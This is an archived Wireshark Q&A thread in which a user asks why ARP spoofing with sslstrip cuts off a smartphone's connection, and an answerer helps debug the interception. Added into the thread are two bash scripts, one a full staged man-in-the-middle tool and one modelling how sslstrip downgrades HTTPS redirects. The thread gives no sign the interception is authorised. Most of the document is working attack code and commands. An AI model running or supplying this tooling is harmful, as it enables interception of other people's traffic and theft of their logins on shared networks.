This is a static archive of our old Q&A Site. Please post any new questions and answers at ask.wireshark.org.

Victim loses connection


I run:

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8095

sudo sslstrip -k -l 8095

then:

sudo bash -c 'echo "1" > /proc/sys/net/ipv4/ip_forward'

sudo arpspoof -i wlan0 -t 192.168.1.123 192.168.1.254

Then my victim (a smartphone whose connection I want to intercept, for fun) loses its internet connection. I disabled the firewall (I use Ubuntu), but it is still the same. Why?

By the way, the connection is secured by WPA2 (I have the pre-shared key, obviously); maybe that's what causes it?

asked 03 May '14, 14:06


tttttttttttt2

edited 03 May '14, 14:09


One Answer:


WPA2 shouldn't pose a problem for ARP spoofing. Can you share a link to an uploaded packet capture file of this scenario (https://appliance.cloudshark.org/upload/ )?

Your commands look right, assuming the IP info is correct. I'm not familiar with that sslstrip binary though, as I've only ever seen it as a Python script. Assuming it's effectively the same as the normal sslstrip.py script, try adding the -f flag.

I suggest doing this in parts to rule out what isn't working, too. First set up just arpspoof before forwarding, and make sure the victim can ping the 'gateway' and that you can see it reaching the attacker. If that works, move on to IP forwarding, verify that piece, then finally move to SSL stripping. That way you can at least isolate what part of the attack isn't working correctly rather than trying it all and saying the final result doesn't work.

answered 03 May '14, 15:33


Quadratic

edited 03 May '14, 15:33
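The staged bring-up the answer recommends, written out as a script with a check after each stage. This is an added example, not the thread's own commands and not code from the dsniff or sslstrip projects. It assumes root, dsniff's arpspoof, tcpdump, iptables, ss and the sslstrip binary in PATH; the interface and addresses are the placeholders from the question and can be overridden through environment variables. Two things here are choices of this example rather than commands from the thread: the gateway is poisoned as well as the victim, and the REDIRECT rule is limited to the victim's address and the interface so the attacker's own browsing is not diverted.

```shell
#!/bin/bash
# Staged bring-up of the interception from the question, one piece at a time with a
# check after each stage, as the answer suggests. Added example, not the thread's
# own commands. Assumptions: root, dsniff's arpspoof, tcpdump, iptables, ss and the
# sslstrip binary in PATH; interface and addresses are placeholders from the question.
set -eu

IFACE=${IFACE:-wlan0}
VICTIM=${VICTIM:-192.168.1.123}
GATEWAY=${GATEWAY:-192.168.1.254}
PROXY_PORT=${PROXY_PORT:-8095}
IP_FORWARD=${IP_FORWARD:-/proc/sys/net/ipv4/ip_forward}
ARP_PIDS=""
STRIP_PID=""

our_mac() { cat "/sys/class/net/$IFACE/address"; }

# Is forwarding switched on in the given sysctl file?  Kept as a pure function so it
# can be checked against any file, not only /proc.
ip_forward_enabled() {            # usage: ip_forward_enabled <path>
    [ "$(cat "$1")" = "1" ]
}

# Stage 1: ARP only.  The question poisons just the victim; this example also poisons
# the gateway so both directions of the conversation cross this host and show up in a
# capture.  Check: a non-ARP frame from the victim must now be addressed to our MAC.
stage_arp() {
    arpspoof -i "$IFACE" -t "$VICTIM" "$GATEWAY" >/dev/null 2>&1 & ARP_PIDS="$ARP_PIDS $!"
    arpspoof -i "$IFACE" -t "$GATEWAY" "$VICTIM" >/dev/null 2>&1 & ARP_PIDS="$ARP_PIDS $!"
    sleep 2
    timeout 15 tcpdump -nni "$IFACE" -c 1 \
        "ether dst $(our_mac) and src host $VICTIM and not arp" >/dev/null 2>&1 \
        || { echo "stage 1 failed: the victim is not sending its traffic to us"; return 1; }
    echo "stage 1 ok: victim traffic arrives here (and stops here until stage 2)"
}

# Stage 2: forwarding.  Until this is on, everything the victim sends dies on this
# host, which is exactly the "victim loses connection" symptom in the question.
# Check: a frame from us carrying the victim's source address must leave the box.
stage_forward() {
    echo 1 > "$IP_FORWARD"
    ip_forward_enabled "$IP_FORWARD" \
        || { echo "stage 2 failed: could not enable forwarding"; return 1; }
    timeout 15 tcpdump -nni "$IFACE" -c 1 \
        "ether src $(our_mac) and src host $VICTIM" >/dev/null 2>&1 \
        || { echo "stage 2 failed: nothing is being forwarded for the victim"; return 1; }
    echo "stage 2 ok: victim traffic is forwarded"
}

# Stage 3: divert the victim's port-80 traffic into sslstrip.  Limiting the rule to
# the victim and the interface is a choice of this example (the question's rule
# matches every host's port-80 traffic).  Only tcp/80 is matched, so a request the
# phone sends straight to https://... is forwarded as-is and never reaches the proxy.
stage_strip() {
    iptables -t nat -A PREROUTING -i "$IFACE" -s "$VICTIM" -p tcp --dport 80 \
        -j REDIRECT --to-port "$PROXY_PORT"
    sslstrip -k -f -l "$PROXY_PORT" >/dev/null 2>&1 & STRIP_PID=$!   # -f as the answer suggests
    sleep 2
    ss -ltn "sport = :$PROXY_PORT" | grep -q LISTEN \
        || { echo "stage 3 failed: nothing listening on $PROXY_PORT"; return 1; }
    echo "stage 3 ok: port 80 from $VICTIM is diverted into sslstrip"
}

# Undo everything on exit.  SIGINT makes arpspoof send corrective ARP replies.
cleanup() {
    iptables -t nat -D PREROUTING -i "$IFACE" -s "$VICTIM" -p tcp --dport 80 \
        -j REDIRECT --to-port "$PROXY_PORT" 2>/dev/null || true
    echo "${ORIG_FORWARD:-0}" > "$IP_FORWARD"
    [ -n "$STRIP_PID" ] && kill "$STRIP_PID" 2>/dev/null || true
    [ -n "$ARP_PIDS" ] && kill -INT $ARP_PIDS 2>/dev/null || true
}

main() {
    ORIG_FORWARD=$(cat "$IP_FORWARD")
    trap cleanup EXIT
    stage_arp
    stage_forward
    stage_strip
    echo "all stages up; press Ctrl-C to tear down"
    wait
}

case "${1:-}" in
    run) main ;;
    *)   echo "usage: $0 run   (as root)" >&2 ;;
esac
```

Run it as `sudo ./mitm-stages.sh run`. It stops at the first stage whose check fails, which tells you which piece to look at, and restores the forwarding setting, the nat rule and the ARP tables on exit. Expect the phone to lose connectivity briefly between stage 1 and stage 2: with the victim's frames arriving here and forwarding still off, they are dropped, so that loss is the expected state at that point rather than a failure.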

@Quadratic: I did what you said and it stops working even when I run just arpspoof alone.

(03 May '14, 15:49) tttttttttttt2

Actually, I've flushed iptables and it kinda works. Except it doesn't work when an https link is visited.

(03 May '14, 16:00) tttttttttttt2

It actually works now, but no packets are captured when https is visited.

(03 May '14, 16:08) tttttttttttt2

Using the python version of sslstrip, I can confirm this is a working method.

If you're saying it works but you don't see packets in the capture when specific sites are visited, I'm thinking it's got to be a problem with your trace. Keep in mind you're not looking for HTTPS toward the victim (so if that's what you don't see, it's not there to be seen).

(03 May '14, 16:35) Quadratic

@Quadratic: It mostly works, I think. If I type gmail.com, it will show the http version; it will not redirect. However, if I type https://gmail.com, it will give https.

(03 May '14, 16:58) tttttttttttt2

If you're still having issues with it you'll need to post a trace to see what's not working correctly, preferably of both sides of the middle-man.

(03 May '14, 19:30) Quadratic

@Quadratic: And it should work? If a person visits https://gmail.com, should it redirect to http://gmail.com?

(03 May '14, 19:42) tttttttttttt2

What do you mean by trace?

(03 May '14, 19:49) tttttttttttt2

By "trace", I mean a packet capture file (e.g. a .pcap file) showing the traffic to and from the proxy, to see what is failing (if anything is). I provided a URL where you can upload a trace file and share the link so that people here can look at it to see what may be going wrong. The redirect being supplied to the client, for example.

(03 May '14, 19:52) Quadratic

And did you add the -f flag to the sslstrip utility as I'd suggested?

(03 May '14, 19:52) Quadratic

@Quadratic: Yes, I did. I get lots of:

--- <exception caught here> ---
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)

(03 May '14, 19:54) tttttttttttt2

Also, do I need to set up Wireshark differently somehow to see HTTPS?

(03 May '14, 19:54) tttttttttttt2

It kinda works, because if I visit gmail.com while I am running this software, it doesn't redirect, whereas other times it does. But if the user types https://, it doesn't redirect to http.

(03 May '14, 19:55) tttttttttttt2

You don't need to set up Wireshark differently to see HTTPS. Can you post that trace of the scenario where you are having a problem, as I explained?

(03 May '14, 21:15) Quadratic

I am not sure, I think I explained everything :(

(04 May '14, 07:16) tttttttttttt2

Host resolution error: [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.DNSLookupError'>: DNS lookup failed: address 'site.com' not found: [Errno -2] Name or service not known.

(04 May '14, 07:42) tttttttttttt2

Here is a tutorial: https://www.youtube.com/watch?v=9PjmaPk20t8

For your error logs, I suggest approaching the owner of that binary file as I'm not familiar with it. With sslstrip.py that tutorial provides a working example.

(04 May '14, 10:08) Quadratic

Ah, just one thing to clarify here if it was a point of confusion: sslstrip will watch for a redirect to HTTPS and prevent it. It will not prevent a direct call to https://x.x.x.x.

(04 May '14, 10:18) Quadratic

@Quadratic: Yes, that's what I meant, direct https. Sorry for the confusion. What about sending fake certificates? Can you check my other topic where I discuss with Kurt (http://ask.wireshark.org/questions/32431/how-to-spoof-packets-send-fake-certificates) please?

(04 May '14, 10:19) tttttttttttt2

Kurt is correct in the last answer he gave to your last question there. I'm not sure what more you would want as a response.

(04 May '14, 11:31) Quadratic
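The point made in the last comments, that sslstrip rewrites the redirect to HTTPS but cannot touch a request the phone sends directly to https://..., comes down to what the question's PREROUTING rule diverts. The following is an added model of that, not sslstrip's code: the rule is reduced to a function that answers whether a packet is diverted, the rewrite is a sed one-liner standing in for sslstrip's link handling, and the 301 response it runs over is constructed for the example.

```shell
#!/bin/bash
# Model of what the question's PREROUTING rule diverts and what sslstrip does with it.
# Added example; the sed rewrite stands in for sslstrip's own link handling.

# The rule "-p tcp --destination-port 80 -j REDIRECT" matches only tcp/80.  A request
# typed as https://host goes to tcp/443, is plainly forwarded, and the proxy never
# sees it, so there is nothing to strip.
diverted_by_rule() {              # usage: diverted_by_rule <proto> <dst-port>
    [ "$1" = "tcp" ] && [ "$2" -eq 80 ]
}

# What the proxy does to plaintext HTTP it does see: every https:// in the response
# (Location header and body links alike) becomes http://, so the client's next
# request is plaintext, goes to tcp/80 and lands inside the rule again.
strip_secure_links() {            # reads an HTTP response on stdin
    sed -E 's#https://#http://#g'
}

# Constructed sample: the redirect a site returns when asked for http://mail.google.com.
SAMPLE_RESPONSE='HTTP/1.1 301 Moved Permanently
Location: https://mail.google.com/mail/
Content-Type: text/html

<a href="https://accounts.google.com/login">Sign in</a>'

# The Location the victim would receive after stripping.
stripped_location() {
    printf '%s\n' "$SAMPLE_RESPONSE" | strip_secure_links \
        | awk -F': ' 'tolower($1) == "location" { print $2 }'
}

# Walk the two cases from the thread.
if diverted_by_rule tcp 80; then
    echo "http://gmail.com  -> tcp/80  -> diverted to the proxy; its response is stripped:"
    printf '%s\n' "$SAMPLE_RESPONSE" | strip_secure_links
fi
if ! diverted_by_rule tcp 443; then
    echo "https://gmail.com -> tcp/443 -> forwarded untouched; the proxy never sees it"
fi
```

The stripped Location the client receives is http://mail.google.com/mail/. What this model leaves out is the other half of the proxy's job: when the client then asks for that http:// URL, sslstrip has to fetch it over TLS from the real server, so it keeps its own list of which links it stripped. Nothing in either half helps with a URL the user types as https:// in the first place, since that connection is never diverted by the rule.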